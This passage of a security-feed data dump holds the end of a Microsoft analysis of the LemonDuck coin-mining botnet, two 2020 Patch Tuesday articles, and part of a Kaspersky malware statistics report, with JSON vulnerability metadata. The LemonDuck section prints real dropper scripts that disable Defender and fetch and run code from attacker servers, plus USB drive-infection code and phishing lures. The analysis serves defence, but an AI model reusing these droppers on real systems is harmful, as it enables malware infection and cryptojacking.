either edge-initiated or facilitated by bot implants moving laterally within an organization, or (2) bot-initiated email campaigns.\n\nLemonDuck acts as a loader for many other follow-on activities, but one if its main functions is to spread by compromising other systems. Since its first appearance, the LemonDuck operators have leveraged scans against both Windows and Linux devices for open or weakly authenticated SMB, Exchange, SQL, Hadoop, REDIS, RDP, or other edge devices that might be vulnerable to password spray or application vulnerabilities like CVE-2017-0144 (EternalBlue), CVE-2017-8464 (LNK RCE), CVE-2019-0708 (BlueKeep), CVE-2020-0796 (SMBGhost), CVE-2021-26855 (ProxyLogon), CVE-2021-26857 (ProxyLogon), CVE-2021-26858 (ProxyLogon), and CVE-2021-27065 (ProxyLogon).\n\nOnce inside a system with an Outlook mailbox, as part of its normal exploitation behavior, LemonDuck attempts to run a script that utilizes the credentials present on the device. The script instructs the mailbox to send copies of a phishing message with preset messages and attachments to all contacts.\n\nBecause of this method of contact messaging, security controls that rely on determining if an email is sent from a suspicious sender don\u2019t apply. This means that email security policies that reduce scanning or coverage for internal mail need to be re-evaluated, as sending emails through contact scraping is very effective at bypassing email controls.\n\nFrom mid-2020 to March 2021, LemonDuck\u2019s email subjects and body content have remained static, as have the attachment names and formats. These attachment names and formats have changed very little from similar campaigns that occurred in early 2020.\n\n \n\n**Sample email subjects ** | **Sample email body content** \n---|--- \n \n * The Truth of COVID-19\n * COVID-19 nCov Special info WHO\n * HALTH ADVISORY:CORONA VIRUS\n * WTF\n * What the fcuk\n * good bye\n * farewell letter\n * broken file\n * This is your order?\n| \n\n * Virus actually comes from United States of America\n * very important infomation for Covid-19\n * see attached document for your action and discretion.\n * the outbreak of CORONA VIRUS is cause of concern especially where forign personal have recently arrived or will be arriving at various intt in near future.\n * what's wrong with you?are you out of your mind!!!!!\n * are you out of your mind!!!!!what 's wrong with you?\n * good bye, keep in touch\n * can you help me to fix the file,i can't read it\n * file is brokened, i can't open it \n \nThe attachment used for these lures is one of three types: .doc, .js, or a .zip containing a .js file. Whatever the type, the file is named \u201creadme\u201d. Occasionally, all three types are present in the same email.\n\n![Screenshot of email related to LemonDuck attack](https://www.microsoft.com/security/blog/uploads/securityprod/2021/07/lemon-duck-email-sample.png)\n\n_Figure 3. Sample email_\n\nWhile the JavaScript is detected by many security vendors, it might be classified with generic detection names. It could be valuable for organizations to sanitize JavaScript or VBScript executing or calling prompts (such as PowerShell) directly from mail downloads through solutions such as [custom detection rules](<https://docs.microsoft.com/en-us/microsoft-365/security/defender/custom-detection-rules?view=o365-worldwide>).\n\nSince LemonDuck began operating, the .zip to .js file execution method is the most common. The JavaScript has replaced the scheduled task that LemonDuck previously used to kickstart the PowerShell script. This PowerShell script has looked very similar throughout 2020 and 2021, with minor changes depending on the version, indicating continued development. Below is a comparison of changes from the most recent iterations of the email-delivered downloads and those from April of 2020.\n\n \n\n**April 2020 PowerShell script** | **March 2021 PowerShell script** \n---|--- \n`var cmd =new ActiveXObject(\"WScript.Shell\");var cmdstr=\"cmd /c start /b notepad \"+WScript.ScriptFullName+\" & powershell -w hidden -c \\\"if([Environment]::OSVersion.version.Major -eq '10'){Set-ItemProperty -Path 'HKCU:\\Environment' -Name 'windir' -Value 'cmd /c powershell -w hidden Set-MpPreference -DisableRealtimeMonitoring 1 & powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString(''http://t.awcna.com/mail.jsp?js*%username%*%computername%''+[Environment]::OSVersion.version.Major) &::';sleep 1;schtasks /run /tn \\\\Microsoft\\\\Windows\\\\DiskCleanup\\\\SilentCleanup /I;Remove-ItemProperty -Path 'HKCU:\\Environment' -Name 'windir' -Force}else{IEx(ne`w-obj`ect Net.WebC`lient).DownloadString('http://t.awcna.com/7p.php');bpu -method migwiz -Payload 'powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString(''http://t.awcna.com/mail.jsp?js*%username%*%computername%''+[Environment]::OSVersion.version.Majo \n//This File is broken.` | `var cmd =new ActiveXObject(\"WScript.Shell\");var cmdstr=\"cmd /c start /b notepad \"+WScript.ScriptFullName+\" & powershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('http://t.z'+'z3r0.com/7p.php?0.7*mail_js*%username%*%computername%*'+[Environment]::OSVersion.version.Major);bpu ('http://t.z'+'z3r0.com/mail.jsp?js_0.7')\";cmd.run(cmdstr,0,1); \n//This File is broken.` \n \n \n\nAfter the emails are sent, the inbox is cleaned to remove traces of these mails. This method of self-spreading is attempted on any affected device that has a mailbox, regardless of whether it is an Exchange server.\n\nOther common methods of infection include movement within the compromised environment, as well as through USB and connected drives. These processes are often kicked off automatically and have occurred consistently throughout the entirety of LemonDuck\u2019s operation.\n\nThese methods run as a series of C# scripts that gather available drives for infection. They also create a running list of drives that are already infected based on whether it finds the threat already installed. Once checked against the running list of infected drives, these scripts attempt to create a set of hidden files in the home directory, including a copy of _readme.js_. Any device that has been affected by the LemonDuck implants at any time could have had any number of drives attached to it that are compromised in this manner. This makes this behavior a possible entry vector for additional attacks.\n\n`DriveInfo[] drives = DriveInfo.GetDrives(); \nforeach (DriveInfo drive in drives) \n{ \nif (blacklist.Contains(drive.Name)) \n{ continue;} \nConsole.WriteLine(\"Detect drive:\"+drive.Name); \nif (IsSupported(drive)) \n{ \nif (!File.Exists(drive + home + inf_data)) \n{ \nConsole.WriteLine(\"Try to infect \"+drive.Name); \nif (CreateHomeDirectory(drive.Name) && Infect(drive.Name)) \n{ \nblacklist.Add(drive.Name); \n} \n} \nelse { \nConsole.WriteLine(drive.Name+\" already infected!\"); \nblacklist.Add(drive.Name); \n} \n} \nelse{ \nblacklist.Add(drive.Name);`\n\n## Comprehensive protection against a wide-ranging malware operation\n\nThe cross-domain visibility and coordinated defense delivered by [Microsoft 365 Defender](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>) is designed for the wide range and increasing sophistication of threats that LemonDuck exemplifies. Microsoft 365 Defender has AI-powered industry-leading protections that can stop multi-component threats like LemonDuck across domains and across platforms. Microsoft 365 Defender for Office 365 detects the malicious emails sent by the LemonDuck botnet to deliver malware payloads as well as spread the bot loader. Microsoft Defender for Endpoint detects and blocks LemonDuck implants, payloads, and malicious activity on Linux and Windows.\n\nMore importantly, Microsoft 365 Defender provides rich investigation tools that can expose detections of LemonDuck activity, including attempts to compromise and gain a foothold on the network, so security operations teams can efficiently and confidently respond to and resolve these attacks. Microsoft 365 Defender correlates cross-platform, cross-domain signals to paint the end-to-end attack chain, allowing organizations to see the full impact of an attack. We also published a threat analytics article on this threat. Microsoft 365 Defender customers can use this report to get important technical details, guidance for investigation, consolidated incidents, and steps to mitigate this threat in particular and modern cyberattacks in general.\n\nIn Part 2 of this blog series, we share our in-depth technical analysis of the malicious actions that follow a LemonDuck infection. These include general, automatic behavior as well as human-initialized behavior. We will also provide guidance for investigating LemonDuck attacks, as well as mitigation recommendations for strengthening defenses against these attacks. **READ: [When coin miners evolve, Part 2: Hunting down LemonDuck and LemonCat attacks](<https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/>).**\n\n \n\n_Microsoft 365 Defender Threat Intelligence Team_\n\nThe post [When coin miners evolve, Part 1: Exposing LemonDuck and LemonCat, modern mining malware infrastructure](<https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-22T16:00:57", "type": "mmpc", "title": "When coin miners evolve, Part 1: Exposing LemonDuck and LemonCat, modern mining malware infrastructure", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0144", "CVE-2017-8464", "CVE-2019-0708", "CVE-2020-0796", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-07-22T16:00:57", "id": "MMPC:E537BA51663A720821A67D2A4F7F7F0E", "href": "https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "krebs": [{"lastseen": "2020-06-16T09:51:45", "description": "**Microsoft** today released software patches to plug at least 129 security holes in its **Windows** operating systems and supported software, by some accounts a record number of fixes in one go for the software giant. None of the bugs addressed this month are known to have been exploited or detailed prior to today, but there are a few vulnerabilities that deserve special attention -- particularly for enterprises and employees working remotely.\n\n![](https://krebsonsecurity.com/wp-content/uploads/2014/07/brokenwindows.png)June marks the fourth month in a row that Microsoft has issued fixes to address more than 100 security flaws in its products. Eleven of the updates address problems Microsoft deems \"critical,\" meaning they could be exploited by malware or malcontents to seize complete, remote control over vulnerable systems without any help from users.\n\nA chief concern among the panoply of patches is a trio of vulnerabilities in the Windows file-sharing technology (a.k.a. Microsoft Server Message Block or \"SMB\" service). Perhaps most troubling of these ([CVE-2020-1301](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1301>)) is a remote code execution bug in SMB capabilities built into **Windows 7** and **Windows Server 2008** systems -- both operating systems that Microsoft stopped supporting with security updates in January 2020. One mitigating factor with this flaw is that an attacker would need to be already authenticated on the network to exploit it, according to security experts at **Tenable**.\n\nThe SMB fixes follow closely on [news that proof-of-concept code was published this week](<https://arstechnica.com/information-technology/2020/06/exploiting-wormable-flaw-on-unpatched-windows-devices-is-about-to-get-easier/>) that would allow anyone to exploit a critical SMB flaw Microsoft patched for **Windows 10** systems in March ([CVE-2020-0796](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796>)). Unlike this month's critical SMB bugs, CVE-2020-0796 does not require the attacker to be authenticated to the target's network. And with countless company employees now working remotely, Windows 10 users who have not yet applied updates from March or later could be dangerously exposed right now.\n\n**Microsoft Office** and **Excel** get several updates this month. Two different flaws in Excel ([CVE-2020-1225](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1225>) and [CVE-2020-1226](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1226>)) could be used to remotely commandeer a computer running Office just by getting a user to open a booby-trapped document. Another weakness ([CVE-2020-1229](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1229>)) in most versions of Office may be exploited to bypass security features in Office simply by previewing a malicious document in the preview pane. This flaw also impacts **Office for Mac**, although updates are not yet available for that platform.\n\nAfter months of giving us a welcome break from patching, **Adobe** has issued [an update](<https://helpx.adobe.com/security/products/flash-player/apsb20-30.html>) for its **Flash Player** program that fixes a single, albeit critical security problem. Adobe says it is not aware of any active exploits against the Flash flaw. Mercifully, **Chrome** and **Firefox** both now disable Flash by default, and Chrome and **IE/Edg**e auto-update the program when new security updates are available. Adobe is slated to retire Flash Player later this year. Adobe also released security updates for its [Experience Manager](<https://helpx.adobe.com/security/products/experience-manager/apsb20-31.html>) and [Framemaker products](<https://helpx.adobe.com/security/products/framemaker/apsb20-32.html>).\n\nWindows 7 users should be aware by now that while a fair number of flaws addressed this month by Microsoft affect Windows 7 systems, this operating system is no longer being supported with security updates (unless you\u2019re an enterprise taking advantage of Microsoft\u2019s [paid extended security updates program](<https://support.microsoft.com/en-us/help/4527878/faq-about-extended-security-updates-for-windows-7>), which is available to Windows 7 Professional and Windows 7 enterprise users).\n\nBefore you update with this month's patch batch, please make sure you have backed up your system and/or important files. It's not uncommon for a wonky Windows update to hose one's system or prevent it from booting properly, and some updates even have known to erase or corrupt files. So do yourself a favor and backup _before_ installing any patches. Windows 10 even has [some built-in tools](<https://lifehacker.com/how-to-back-up-your-computer-automatically-with-windows-1762867473>) to help you do that, either on a per-file/folder basis or by making a complete and bootable copy of your hard drive all at once.\n\nAnd if you wish to ensure Windows has been set to pause updating so you can back up your files and/or system before the operating system decides to reboot and install patches on its own schedule, see [this guide](<https://www.computerworld.com/article/3543189/check-to-make-sure-you-have-windows-updates-paused.html>).\n\nAs always, if you experience glitches or problems installing any of these patches this month, please consider leaving a comment about it below; there\u2019s a better-than-even chance other readers have experienced the same and may chime in here with some helpful tips.\n\nFurther reading:\n\n[AskWoody](<https://www.askwoody.com/>) and [Martin Brinkmann](<https://www.ghacks.net/2020/06/09/microsoft-windows-security-updates-june-2020-overview/>) on Patch Tuesday fixes and potential pitfalls\n\n[Trend Micro's Zero Day Initiative June 2020 patch lowdown](<https://www.zerodayinitiative.com/blog/2020/6/9/the-june-2020-security-update-review>)\n\n[U.S-CERT on Active Exploitation of CVE-2020-0796](<https://www.us-cert.gov/ncas/current-activity/2020/06/05/unpatched-microsoft-systems-vulnerable-cve-2020-0796>)", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-06-10T02:43:20", "type": "krebs", "title": "Microsoft Patch Tuesday, June 2020 Edition", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796", "CVE-2020-1225", "CVE-2020-1226", "CVE-2020-1229", "CVE-2020-1301"], "modified": "2020-06-10T02:43:20", "id": "KREBS:A05C5DFD2D31CCAAE49C4FBA8C7469E4", "href": "https://krebsonsecurity.com/2020/06/microsoft-patch-tuesday-june-2020-edition/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-18T09:42:02", "description": "**Microsoft** today released updates to fix 113 security vulnerabilities in its various **Windows** operating systems and related software. Those include at least three flaws that are actively being exploited, as well as two others which were publicly detailed prior to today, potentially giving attackers a head start in figuring out how to exploit the bugs.\n\n![](https://krebsonsecurity.com/wp-content/uploads/2014/07/brokenwindows.png)Nineteen of the weaknesses fixed on this Patch Tuesday were assigned Microsoft's most-dire \u201ccritical\u201d rating, meaning malware or miscreants could exploit them to gain complete, remote control over vulnerable computers without any help from users.\n\nNear the top of the heap is [CVE-2020-1020](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1020>), a remotely exploitable bug in the **Adobe Font Manager** library that was first detailed in late March when Microsoft said it had seen the flaw being used in active attacks.\n\nThe Adobe Font Manager library is the source of yet another zero-day flaw -- [CVE-2020-0938](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0938>) -- although experts at security vendor **Tenable** say there is currently no confirmation that the two are related to the same set of in-the-wild attacks. Both flaws could be exploited by getting a Windows users to open a booby-trapped document or viewing one in the Windows Preview Pane.\n\nThe other zero-day flaw ([CVE-2020-1027](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1027>)) affects **Windows 7** and **Windows 10 systems**, and earned a slightly less dire \"important\" rating from Microsoft because it's an \"elevation of privilege\" bug that requires the attacker to be locally authenticated.\n\nMany security news sites are reporting that Microsoft addressed a total of four zero-day flaws this month, but it appears the advisory for a critical Internet Explorer flaw ([CVE-2020-0968](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0968>)) has been revised to indicate Microsoft has not yet received reports of it being used in active attacks. However, the advisory says this IE bug is likely to be exploited soon.\n\nResearchers at security firm **Recorded Future** zeroed in on [CVE-2020-0796](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796>), a critical vulnerability dubbed \"SMBGhost\" that was rumored to exist in last month's Patch Tuesday but for which an out-of-band patch wasn't released until March 12. The problem resides in a file-sharing component of Windows, and could be exploited merely by sending the victim machine specially-crafted data packets. Proof-of-concept code showing how to exploit the bug was released April 1, but so far there are no indications this method has been incorporated into malware or active attacks.\n\nRecorded Future's **Allan Liska** notes that one reason these past few months have seen so many patches from Microsoft is the company [recently hired \"SandboxEscaper,\"](<https://twitter.com/SandboxBear/status/1210133985478791171>) a nickname used by the security researcher responsible for [releasing more than a half-dozen zero-day flaws](<https://arstechnica.com/information-technology/2019/05/serial-publisher-of-windows-0days-drops-exploits-for-3-more-unfixed-flaws/>) against Microsoft products last year.\n\n\"SandboxEscaper has made several contributions to this month\u2019s Patch Tuesday,\" Liska said. \"This is great news for Microsoft and the security community at large.\"\n\nOnce again, Adobe has blessed us with a respite from updating its Flash Player program with security fixes. I look forward to the end of this year, when the company has promised to sunset this buggy and insecure program once and for all. Adobe did release security updates for its [ColdFusion, After Effects and Digital Editions software](<https://blogs.adobe.com/psirt/?p=1859>).\n\nSpeaking of buggy software platforms, **Oracle** has released a quarterly patch update to fix more than 400 security flaws across multiple products, including its **Java SE** program. If you've got Java installed and you need/want to keep it installed, please [make sure it's up-to-date](<https://java.com/en/download/help/java_update.xml#manual>).\n\nNow for my obligatory disclaimers. Just a friendly reminder that while many of the vulnerabilities fixed in today\u2019s Microsoft patch batch affect Windows 7 operating systems -- including all three of the zero-day flaws -- this OS is no longer being supported with security updates (unless you\u2019re an enterprise taking advantage of Microsoft\u2019s [paid extended security updates program](<https://support.microsoft.com/en-us/help/4527878/faq-about-extended-security-updates-for-windows-7>), which is available to Windows 7 Professional and Windows 7 enterprise users).\n\nIf you rely on Windows 7 for day-to-day use, it\u2019s to think about upgrading to something newer. That something might be a computer with Windows 10. Or maybe you have always wanted that shiny MacOS computer.\n\nIf cost is a primary motivator and the user you have in mind doesn\u2019t do much with the system other than browsing the Web, perhaps a **Chromebook** or an older machine with a recent version of **Linux** is the answer (Ubuntu may be easiest for non-Linux natives). Whichever system you choose, it\u2019s important to pick one that fits the owner\u2019s needs and provides security updates on an ongoing basis.\n\nKeep in mind that while staying up-to-date on Windows patches is a must, it\u2019s important to make sure you\u2019re updating only after you\u2019ve backed up your important data and files. A reliable backup means you\u2019re not losing your mind when the odd buggy patch causes problems booting the system.\n\nSo do yourself a favor and backup your files before installing any patches. Windows 10 even has [some built-in tools](<https://lifehacker.com/how-to-back-up-your-computer-automatically-with-windows-1762867473>) to help you do that, either on a per-file/folder basis or by making a complete and bootable copy of your hard drive all at once.\n\nAs always, if you experience glitches or problems installing any of these patches this month, please consider leaving a comment about it below; there\u2019s a better-than-even chance other readers have experienced the same and may chime in here with some helpful tips. Also, keep an eye on the [AskWoody blog](<https://www.askwoody.com/2020/february-2020-patch-tuesday-foibles/>) from **Woody Leonhard**, who keeps a close eye on buggy Microsoft updates each month.\n\nFurther reading:\n\n[Qualys breakdown on April 2020 Patch Tuesday](<https://blog.qualys.com/laws-of-vulnerabilities/2020/04/14/april-2020-patch-tuesday-113-vulns-19-critical-0-day-patches-sharepoint-adobe-coldfusion>)\n\n[SANS Internet Storm Center on Patch Tuesday](<https://isc.sans.org/forums/diary/Microsoft+April+2020+Patch+Tuesday/26022/>)", "edition": 2, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-04-14T22:24:10", "type": "krebs", "title": "Microsoft Patch Tuesday, April 2020 Edition", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796", "CVE-2020-0938", "CVE-2020-0968", "CVE-2020-1020", "CVE-2020-1027"], "modified": "2020-04-14T22:24:10", "id": "KREBS:1093D39181F7F724932AED0E8DA017A8", "href": "https://krebsonsecurity.com/2020/04/microsoft-patch-tuesday-april-2020-edition/", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "securelist": [{"lastseen": "2020-05-20T11:49:25", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22101624/malware_SL_pic3-990x400.jpg)\n\n_These statistics are based on detection verdicts for Kaspersky products received from users who consented to providing statistical data._\n\n## Quarterly figures\n\nAccording to Kaspersky Security Network,\n\n * Kaspersky solutions blocked 726,536,269 attacks launched from online resources in 203 countries across the globe.\n * A total of 442,039,230 unique URLs were recognized as malicious by Web Anti-Virus components.\n * Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 249,748 unique users.\n * Ransomware attacks were defeated on the computers of 178,922 unique users.\n * Our File Anti-Virus detected 164,653,290 unique malicious and potentially unwanted objects.\n * Kaspersky products for mobile devices detected: \n * 1,152,662 malicious installation packages\n * 42,115 installation packages for mobile banking trojans\n * 4339 installation packages for mobile ransomware trojans\n\n## Mobile threats\n\n### Quarter events\n\nQ1 2020 will be remembered primarily for the coronavirus pandemic and cybercriminals' exploitation of the topic. In particular, the creators of a new modification of the Ginp banking trojan renamed their malware Coronavirus Finder and then began offering it for \u20ac0.75 disguised as an app supposedly capable of detecting nearby people infected with COVID-19. Thus, the cybercriminals tried not only to scam users by exploiting hot topics, but to gain access to their bank card details. And, because the trojan remains on the device after stealing this data, the cybercriminals could intercept text messages containing two-factor authorization codes and use the stolen data without the victim's knowledge.\n\nAnother interesting find this quarter was [Cookiethief](<https://securelist.com/cookiethief/96332/>), a trojan designed to steal cookies from mobile browsers and the Facebook app. In the event of a successful attack, the malware provided its handler with access to the victim's account, including the ability to perform various actions in their name, such as liking, reposting, etc. To prevent the service from spotting any abnormal activity in the hijacked profile, the trojan contains a proxy module through which the attackers issue commands.\n\nThe third piece of malware that caught our attention this reporting quarter was trojan-Dropper.AndroidOS.Shopper.a. It is designed to [help cybercriminals to leave fake reviews and drive up ratings on Google Play](<https://securelist.com/smartphone-shopaholic/95544/>). The attackers' goals here are obvious: to increase the changes of their apps getting published and recommended, and to lull the vigilance of potential victims. Note that to rate apps and write reviews, the trojan uses Accessibility Services to gain full control over the other app: in this case, the official Google Play client.\n\n### Mobile threat statistics\n\nIn Q1 2020, Kaspersky's mobile products and technologies detected 1,152,662 malicious installation packages, or 171,669 more than in the previous quarter.\n\n_Number of malicious installation packages detected, Q1 2019 \u2013 Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13193928/sl_malware_report_01-kolichestvo-obnaruzhennyh-vredonosnyh-ustanovochnyh-paketov-q1-2019-q1-2019.png>)_\n\nStarting in Q2 2019, we have seen a steady rise in the number of mobile threats detected. Although it is too early to sound the alarm (2019 saw the lowest number of new threats in recent years), the trend is concerning.\n\n### Distribution of detected mobile apps by type\n\n_Distribution of newly detected mobile programs by type, Q1 2020 and Q4 2019 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13194010/sl_malware_report_02-en-mobile-behavior.png>)_\n\nOf all the threats detected in Q1, half were unwanted adware apps (49.9%), their share having increased by 19 p.p. compared to the previous quarter. Most often, we detected members of the HiddenAd and Ewind families, with a combined slice of 40% of all detected adware threats, as well as the FakeAdBlocker family (12%).\n\nPotentially unwanted RiskTool apps (28.24%) took second place; the share of this type of threat remained almost unchanged. The Smsreg (49% of all detected threats of this class), Agent (17%) and Dnotua (11%) families were the biggest contributors. Note that in Q1, the number of detected members of the Smsreg family increased by more than 50 percent.\n\nIn third place were Trojan-Dropper-type threats (9.72%). Although their share decreased by 7.63 p.p. against the previous quarter, droppers remain one of the most common classes of mobile threats. Ingopack emerged as Q1's leading family with a massive 71% of all Trojan-Dropper threats, followed by Waponor (12%) and [Hqwar](<https://securelist.com/hqwar-the-higher-it-flies-the-harder-it-drops/93689/>) (8%) far behind.\n\nIt is worth noting that mobile droppers are most often used for installing financial malware, although some financial threats can spread without their help. The share of these self-sufficient threats is quite substantial: in particular, the share of Trojan-Banker in Q1 increased by 2.1 p.p. to 3.65%.\n\n### Top 20 mobile malware programs\n\n_Note that this malware rankings do not include potentially dangerous or unwanted programs such as RiskTool or adware._\n\n| **Verdict ** | **%*** \n---|---|--- \n1 | DangerousObject.Multi.Generic | 44.89 \n2 | Trojan.AndroidOS.Boogr.gsh | 9.09 \n3 | DangerousObject.AndroidOS.GenericML | 7.08 \n4 | Trojan-Downloader.AndroidOS.Necro.d | 4.52 \n5 | Trojan.AndroidOS.Hiddapp.ch | 2.73 \n6 | Trojan-Downloader.AndroidOS.Helper.a | 2.45 \n7 | Trojan.AndroidOS.Handda.san | 2.31 \n8 | Trojan-Dropper.AndroidOS.Necro.z | 2.30 \n9 | Trojan.AndroidOS.Necro.a | 2.19 \n10 | Trojan-Downloader.AndroidOS.Necro.b | 1.94 \n11 | Trojan-Dropper.AndroidOS.Hqwar.gen | 1.82 \n12 | Trojan-Dropper.AndroidOS.Helper.l | 1.50 \n13 | Exploit.AndroidOS.Lotoor.be | 1.46 \n14 | Trojan-Dropper.AndroidOS.Lezok.p | 1.46 \n15 | Trojan-Banker.AndroidOS.Rotexy.e | 1.43 \n16 | Trojan-Dropper.AndroidOS.Penguin.e | 1.42 \n17 | Trojan-SMS.AndroidOS.Prizmes.a | 1.39 \n18 | Trojan.AndroidOS.Dvmap.a | 1.24 \n19 | Trojan.AndroidOS.Agent.rt | 1.21 \n20 | Trojan.AndroidOS.Vdloader.a | 1.18 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile products that were attacked._\n\nFirst place in our Top 20 as ever went to DangerousObject.Multi.Generic (44.89%), the verdict we use for malware detected [using cloud technology](<https://www.kaspersky.com/enterprise-security/wiki-section/products/big-data-the-astraea-technology>). They are triggered when the antivirus databases still lack the data for detecting a malicious program, but the Kaspersky Security Network cloud already contains information about the object. This is basically how the latest malware is detected.\n\nSecond and third places were claimed by Trojan.AndroidOS.Boogr.gsh (9.09%) and DangerousObject.AndroidOS.GenericML (7,08%) respectively. These verdicts are assigned to files that are recognized as malicious by our [machine-learning systems](<https://www.kaspersky.com/enterprise-security/wiki-section/products/machine-learning-in-cybersecurity>).\n\nIn fourth (Trojan-Downloader.AndroidOS.Necro.d, 4.52%) and tenth (Trojan-Downloader.AndroidOS.Necro.b, 1.94%) places are members of the Necro family, whose main task is to download and install modules from cybercriminal servers. Eighth-placed Trojan-Dropper.AndroidOS.Necro.z (2.30%) acts in a similar way, extracting from itself only those modules that it needs. As for Trojan.AndroidOS.Necro.a, which took ninth place (2.19%), cybercriminals assigned it a different task: the trojan follows advertising links and clicks banner ads in the victim's name.\n\nTrojan.AndroidOS.Hiddapp.ch (2.73%) claimed fifth spot. As soon as it runs, the malware hides its icon on the list of apps and continues to operate in the background. The trojan's payload can be other trojan programs or adware apps.\n\nSixth place went to Trojan-Downloader.AndroidOS.Helper.a (2.45%), which is what Trojan-Downloader.AndroidOS.Necro usually delivers. Helper.a is tasked with downloading arbitrary code from the cybercriminals' server and running it.\n\nThe verdict Trojan.AndroidOS.Handda.san (2.31%) in seventh place is a group of diverse trojans that hide their icons, gain Device Admin rights on the device, and use packers to evade detection.\n\nTrojan-Banker.AndroidOS.Rotexy.e (1.43%) and Trojan-Dropper.AndroidOS.Penguin.e (1.42%) warrant a special mention. The former is the only banking trojan in the top 20 this past quarter. The Rotexy family is all of six years old, and its members have the functionality to steal bank card details and intercept two-factor payment authorization messages. In turn, the first member of the Penguin dropper family was only detected last July and had gained significant popularity by Q1 2020.\n\n### Geography of mobile threats\n\n \n\n_Map of infection attempts by mobile malware, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13194110/sl_malware_report_03-en-mobile-all-map.png>)_\n\n**Top 10 countries by share of users attacked by mobile threats**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Iran | 39.56 \n2 | Algeria | 21.44 